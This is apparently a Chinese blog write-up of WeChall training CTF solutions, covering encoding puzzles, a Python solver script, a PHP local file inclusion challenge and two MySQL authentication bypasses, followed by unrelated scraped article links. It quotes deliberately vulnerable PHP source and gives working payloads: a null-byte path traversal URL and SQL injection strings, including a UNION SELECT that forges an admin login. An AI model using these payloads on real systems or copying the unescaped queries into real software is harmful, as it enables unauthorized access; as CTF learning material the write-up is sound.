前言:

开始打CTF,掌握一些新的姿势与知识。

这里我选择的平台是Wechall。这里从简单到难

WP部分:

Training: Get SourcedAnswer:

查看网页源代码

Training: Stegano IAnswer

这里有张图片,下载。用十六进制打开获得password

Training: Crypto - Caesar IAnswer

题目提示凯撒密码加密。这里感谢一下群里某位师傅发的进制转换器。很好用

Training: WWW-Robots (HTTP, Training)

访问robots.txt

Training: ASCIIAnswer

Ascii码转换:

Ascii:84, 104, 101, 32, 115, 111, 108, 117, 116, 105, 111, 110, 32, 105, 115, 58, 32, 101, 110, 97, 110, 114, 114, 111, 108, 97, 98, 108, 111

字符:The solution ion is: enanrroablo

密码是:enanrroablo

Encodings: URLAnswer

url编码解密
%59%69%70%70%65%68%21%20%59%6F%75%72%20%55%52%4C%20%69%73%20%63%68%61%6C%6C%65%6E%67%65%2F%74%72%61%69%6E%69%6E%67%2F%65%6E%63%6F%64%69%6E%67%73%2F%75%72%6C%2F%73%61%77%5F%6C%6F%74%69%6F%6E%2E%70%68%70%3F%70%3D%61%6C%62%65%61%63%67%65%64%63%67%67%26%63%69%64%3D%35%32%23%70%61%73%73%77%6F%72%64%3D%66%69%62%72%65%5F%6F%70%74%69%63%73%20%56%65%72%79%20%77%65%6C%6C%20%64%6F%6E%65%21

密码是:wc_profile_slide

Training: Encodings IAnswer

一把二进制:

10101001101000110100111100110100

00011101001100101111100011101000

10000011010011110011010000001101

11010110111000101101001111010001

00000110010111011101100011110111

11100100110010111001000100000110

00011110011110001111010011101001

01011100100000101100111011111110

10111100100100000111000011000011

11001111100111110111110111111100

10110010001000001101001111001101

00000110010111000011110011111100

11110011111010011000011110010111

0100110010111100100101110

联想到到二进制转ASK
密码是:fibre_optics

Training: Programming 1 (Training, Coding)

要求是:当您访问此链接时,您会收到一条消息。
将相同的消息提交回http://www.wechall.net/challenge/training/programming1/index.php?answer=the_message 
您的时间限制是1.337秒

用python获取到id,在进行提交

代码:

import requests

url='http://www.wechall.net/challenge/training/programming1/index.php?action=request'

url2='http://www.wechall.net/challenge/training/programming1/index.php?answer=the_message'

def tijiao():

  headers={'user-agetn':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}

      cookie={'xx':'xxxxx'}

       rest=requests.get(url=url,headers=headers,cookies=cookie)

        yc=url2+rest.content.decode('utf-8')

        bd=requests.get(url=yc,headers=headers,cookie=cookie)

        print(bd.content.decode('utf-8'))

tijiao()

Training: PHP LFI

本地文件包含漏洞,要求:你的任务是利用这个代码,这显然有一个LFI漏洞../solution.php中 有很多重要的东西,所以请为我们包含并执行这个文件。 以下是脚本的一些示例(在下面的框中):index.php?file = welcomeindex.php?file = newsindex.php?file = forums 为了进行调试,您可以再次查看整个源代码,也作为突出显示的版本

题目给出的源代码:

<?php

# Higlighter Plain

if (isset($_GET['show']) && $_GET['show'] === 'source')

{

	header('Content-Type: text/plain; charset=utf8;');

	echo file_get_contents('index.php');

	die();

}

# Change dir to web root

chdir('../../../../../');

# Print the website header

define('GWF_PAGE_TITLE', 'Local File Inclusion');

require_once('challenge/html_head.php');

if (false === ($chall = WC_Challenge::getByTitle('Training: PHP LFI'))) {

	$chall = WC_Challenge::dummyChallenge('Training: PHP LFI', 2, 'challenge/training/php/lfi/up/index.php', false);

}

$chall->showHeader();

# Highlighter BBCode

if (isset($_GET['highlight']) && $_GET['highlight'] === 'christmas')

{

	echo GWF_Message::display('[PHP]'.file_get_contents($_SERVER['SCRIPT_FILENAME']).'[/PHP]');

	require_once('challenge/html_foot.php');

	return;

}

###############################

### Here is your exploit :) ###

###############################

$code = '$filename = \'pages/\'.(isset($_GET["file"])?$_GET["file"]:"welcome").\'.html\';';

$code_emulate_pnb = '$filename = Common::substrUntil($filename, "\\0");'; # Emulate Poison Null Byte for PHP>=5.3.4

$code2 = 'include $filename;';

### End of exploit ###

# Show the mission box

$url = 'index.php?file=';

$ex = array('welcome', 'news', 'forums');

$showsrc1 = 'index.php?show=source';

$showsrc2 = 'index.php?highlight=christmas';

foreach ($ex as $i => $e) { $ex[$i] = htmlspecialchars($url.$e); }

echo GWF_Box::box($chall->lang('info', array(GWF_Message::display('[PHP]'.$code.PHP_EOL.$code2.'[/PHP]'), '../solution.php', $showsrc1, $showsrc2, $ex[0], $ex[1], $ex[2])), $chall->lang('title'));

# Execute the code, using eval.

GWF_Debug::setDieOnError(false);

GWF_Debug::setMailOnError(false);

eval($code.$code_emulate_pnb); # eval the first line

echo '<div class="box">'.PHP_EOL;

echo '<div class="box_t">'.$chall->lang('example_title').' ('.htmlspecialchars($filename).')'.'</div>'.PHP_EOL;

echo '<div class="box_c">'.PHP_EOL;

if (lfiIsSafeDir($filename) === true) { eval($code2); } # Eval the second line, when safe.

else { echo GWF_HTML::error('LFI', $chall->lang('err_basedir'), false); }

echo '</div>'.PHP_EOL;

echo '</div>'.PHP_EOL;

GWF_Debug::setMailOnError(true);

GWF_Debug::setDieOnError(true);

# Show credits box

if (false !== ($minus = GWF_User::getByName('minus')))

{

	echo GWF_Box::box($chall->lang('credits', array($minus->displayProfileLink())));

}

# Show end of website

echo $chall->copyrightFooter();

require_once('challenge/html_foot.php');

### Safety first ###

function lfiIsSafeDir($filename)

{

	$valid = array(

		'pages',

		'pages/../..',

		'pages/..',

	);

	$d = dirname($filename);

	return in_array($d, $valid, true);

}

?>

通过尝试发现会把包含的文件在后缀名加上.html

然后得出结果:http://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../../solution.php%00

通过%00截断

MySQL Authentication Bypass - The classic

mysql 1,给你一个表单要求你登录进行。

题目给的源代码:

<?php

/* TABLE STRUCTURE

CREATE TABLE IF NOT EXISTS users (

userid    INT(11) UNSIGNED AUTO_INCREMENT PRIMARY KEY,

username  VARCHAR(32) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL,

password  CHAR(32) CHARACTER SET ascii COLLATE ascii_bin NOT NULL

) ENGINE=myISAM;

*/

# Username and Password sent?

if ( ('' !== ($username = Common::getPostString('username'))) && (false !== ($password = Common::getPostString('password', false))) ) {

	auth1_onLogin($chall, $username, $password);

}

/**

 * Get the database for this challenge.

 * @return GDO_Database

 */

function auth1_db()

{

	if (false === ($db = gdo_db_instance('localhost', WCC_AUTH_BYPASS1_USER, WCC_AUTH_BYPASS1_PASS, WCC_AUTH_BYPASS1_DB))) {

		die('Database error 0815_1!');

	}

	$db->setLogging(false);

	$db->setEMailOnError(false);

	return $db;

}

/**

 * Exploit this!

 * @param WC_Challenge $chall

 * @param unknown_type $username

 * @param unknown_type $password

 * @return boolean

 */

function auth1_onLogin(WC_Challenge $chall, $username, $password)

{

	$db = auth1_db();

	$password = md5($password);

	$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";

	if (false === ($result = $db->queryFirst($query))) {

		echo GWF_HTML::error('Auth1', $chall->lang('err_unknown'), false); # Unknown user

		return false;

	}

	# Welcome back!

	echo GWF_HTML::message('Auth1', $chall->lang('msg_welcome_back', htmlspecialchars($result['username'])), false);

	# Challenge solved?

	if (strtolower($result['username']) === 'admin') {

		$chall->onChallengeSolved(GWF_Session::getUserID());

	}

	return true;

}

?>

<form action="index.php" method="post">

<table>

<tr>

	<td><?php echo $chall->lang('username'); ?>:</td>

	<td><input type="text" name="username" value="" /></td>

</tr>

<tr>

	<td><?php echo $chall->lang('password'); ?>:</td>

	<td><input type="password" name="password" value="" /></td>

</tr>

<tr>

	<td></td>

	<td><input type="submit" name="login" value="<?php echo $chall->lang('btn_login'); ?>" /></td>

</tr>

</table>

</form>

 没有任何过滤

‘or’1='1即可

MySQL Authentication Bypass II:

上一题的升级版,再次查看题目给的源代码

发现秘密和用户名分开验证。做了一定的措施

但是没做过滤。

源代码:

<?php

/* TABLE STRUCTURE

CREATE TABLE IF NOT EXISTS users (

userid    INT(11) UNSIGNED AUTO_INCREMENT PRIMARY KEY,

username  VARCHAR(32) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL,

password  CHAR(32) CHARACTER SET ascii COLLATE ascii_bin NOT NULL

) ENGINE=myISAM;

*/

# Username and Password sent?

if ( ('' !== ($username = Common::getPostString('username'))) && (false !== ($password = Common::getPostString('password', false))) ) {

	auth2_onLogin($chall, $username, $password);

}

/**

 * Get the database for this challenge.

 * @return GDO_Database

 */

function auth2_db()

{

	if (false === ($db = gdo_db_instance('localhost', WCC_AUTH_BYPASS2_USER, WCC_AUTH_BYPASS2_PASS, WCC_AUTH_BYPASS2_DB))) {

		die('Database error 0815_2!');

	}

	$db->setLogging(false);

	$db->setEMailOnError(false);

	return $db;

}

/**

 * Exploit this! It is the same as MySQL-I, but with an additional check, marked with ###

 * @param WC_Challenge $chall

 * @param unknown_type $username

 * @param unknown_type $password

 * @return boolean

 */

function auth2_onLogin(WC_Challenge $chall, $username, $password)

{

	$db = auth2_db();

	$password = md5($password);

	$query = "SELECT * FROM users WHERE username='$username'";

	if (false === ($result = $db->queryFirst($query))) {

		echo GWF_HTML::error('Auth2', $chall->lang('err_unknown'), false);

		return false;

	}

	#############################

	### This is the new check ###

	if ($result['password'] !== $password) {

		echo GWF_HTML::error('Auth2', $chall->lang('err_password'), false);

		return false;

	} #  End of the new code  ###

	#############################

	echo GWF_HTML::message('Auth2', $chall->lang('msg_welcome_back', array(htmlspecialchars($result['username']))), false);

	if (strtolower($result['username']) === 'admin') {

		$chall->onChallengeSolved(GWF_Session::getUserID());

	}

	return true;

}

?>

<form action="index.php" method="post">

<table>

<tr>

	<td><?php echo $chall->lang('username'); ?>:</td>

	<td><input type="text" name="username" value="" /></td>

</tr>

<tr>

	<td><?php echo $chall->lang('password'); ?>:</td>

	<td><input type="password" name="password" value="" /></td>

</tr>

<tr>

	<td></td>

	<td><input type="submit" name="login" value="<?php echo $chall->lang('btn_login'); ?>" /></td>

</tr>

</table>

</form>

  

如果username存在则执行查询,并且为admin。我们用unnion 这条语句把判断给pass掉即可。

得出答案:

username :' union select 1,'admin' as username ,md5('1') as password from users where username ='admin'#
password:1

Wechall 部分WP的更多相关文章

  1. 逆天通用水印支持Winform,WPF,Web,WP,Win10。支持位置选择(9个位置 ==》[X])

    常用技能:http://www.cnblogs.com/dunitian/p/4822808.html#skill 逆天博客:http://dnt.dkil.net 逆天通用水印扩展篇~新增剪贴板系列 ...

  2. wp已死,metro是罪魁祸首!

    1.这篇文章肯定会有类似这样的评论:“我就是喜欢wp,我就是喜欢metro,我就是软粉“等类似的信仰论者发表的评论. 2.2014年我写过一篇文章,windows phone如何才能在中国翻身? 我现 ...

  3. 关于 WP 开发中.xaml 与.xaml.cs 的关系

    今天我们先来看一下在WP8.1开发中最长见到的几个文件之间的关系.比较论证,在看这个问题之前我们简单看看.NET平台其他两个不同的框架: Windows Forms 先看看Window Forms中的 ...

  4. Android,ios,WP三大手机系统对比

    从前,我以为.一个手机系统只是一个系统的UI风格,没什么不同的.然而,在我混合使用这三个手机系统之后,才明白,一个手机系统远不只一个UI那么简单,而真的是可以称之为一个“生态”. 首先祭出三台经典设备 ...

  5. 搜狗输入法wp风格皮肤

    换了个nexus 发现输入法真的没有wp的好用 没办法,刚好搜狗输入法有定制皮肤的选项,所以自己做了个wp风格的输入法皮肤. 一点微小的工作 http://pan.baidu.com/s/1kVsHd ...

  6. 免费获取WP之类的开发者权限或免费使用Azure 2015-10-19

    上一次弄wp真机调试的时候,卡住了,这里讲一下怎么解决(http://www.cnblogs.com/dunitian/p/4870959.html) 进这个网址注册一下:https://www.dr ...

  7. 【WP开发】读写剪贴板

    在WP 8.1中只有Silverlight App支持操作剪贴板的API,Runtime App并不支持.不过,在WP 10中也引入了可以操作剪贴板的API. 顺便说点题外话,有人会说,我8.1的开发 ...

  8. 【WP开发】不同客户端之间传输加密数据

    在上一篇文章中,曾说好本次将提供一个客户端之间传输加密数据的例子.前些天就打算写了,只是因一些人类科技无法预知的事情发生,故拖到今天. 本示例没什么技术含量,也没什么亮点,Bug林立,只不过提供给有需 ...

  9. 【WP开发】加密篇:双向加密

    说起双向加密,如果以前在.NET开发中弄过加/解密的朋友都不会陌生,常用的算法有DES.AES等.在RT应用程序中,也提供了加密相关的API,算法自然是一样的,只是API的封装方式不同罢了,因为RT不 ...

随机推荐

  1. win10系统如何进入BIOS模式

    前言 安装双系统时,一般需要设置一些BOOT的选项值,比如security boot的选项.以前都是重启之后按F2或者F12等进入BIOS模式的, 但是博主按照这种方式没有正确进入,本文就针对这一问题 ...

  2. 将整个文件夹推上github

    /*游戏或者运动才能让我短暂的忘记心痛,现如今感觉学习比游戏和运动还重要——曾少锋*/ 首先你要有一个本地仓库和一个远程仓库(github中的仓库).git文件夹下面不能含有 git文件夹,如果有的话 ...

  3. CF1143F/1142C U2

    CF1143F/1142C U2 巧妙的思维题.注意到这里只用两个点就可以确定一根抛物线,联想到两点确定一条直线,尝试转化. \(y=x^2+bx+c\) 就可以写成 \(y-x^2=bx+c\) , ...

  4. LG2375 [NOI2014]动物园

    题意 给定一个长为\(L\)的字符串(\(L \leq 1e6\)) 求一个\(num\)数组,\(num[i]\)表示长度为\(i\)的前缀中字符串\(S'\)的数量,其中\(S'\)既是该前缀的前 ...

  5. FastAdmin 开发环境详细设置

    一图胜千言 FastAdmin开发环境 Windows 网页安装 鼠标点点就可以了,不用说明. 命令行安装 环境准备 装有 Windows 7 的PC .(这是一句废话,不用理这句.) 服务器软件 A ...

  6. 单变量微积分笔记20——三角替换1(sin和cos)

    sin和cos的常用公式 基本公式: 半角公式: 微分公式: 积分公式: 三角替换 示例1 根据微分公式,cosxdx = dsinx 示例2 示例3 半角公式 示例1 示例2 解法1: 解法2: 综 ...

  7. position 属性值:relative 与 absolute 区别

    absolute 能让元素 inline-block 化: 例如一个div标签默认宽度是100%显示的,但是一旦被absolute属性缠上,则100%默认宽度就会变成自适应内部元素的宽度. float ...

  8. POJ3468——树状数组支持两个区间操作

    题目:http://poj.org/problem?id=3468 推断过程可自己查,得式子:fixsum(x) = (x+1) * ∑(i=1,x)fi - ∑(i=1,x)i*fi; 其中 f 是 ...

  9. 使用php在服务器端生成图文验证码(二)

    图文验证码的实现原理: 1):准备些许图片将其存储在数据库,每一张图片对应一个标识字段. 2):在服务器端使用数组的形式将图片与标识字段组合起来. 3):随机给客户端返回图片,并接受用户输入的字段. ...

  10. git Push failed: Could not read from remote repository 解决方案

    解决的办法很简单,进入Android Studio配置界面,选择Version Control——>Git,在右边界面切换SSH下拉选项为Native,最后重新提交.如果解决你的问题,记得分享哦 ...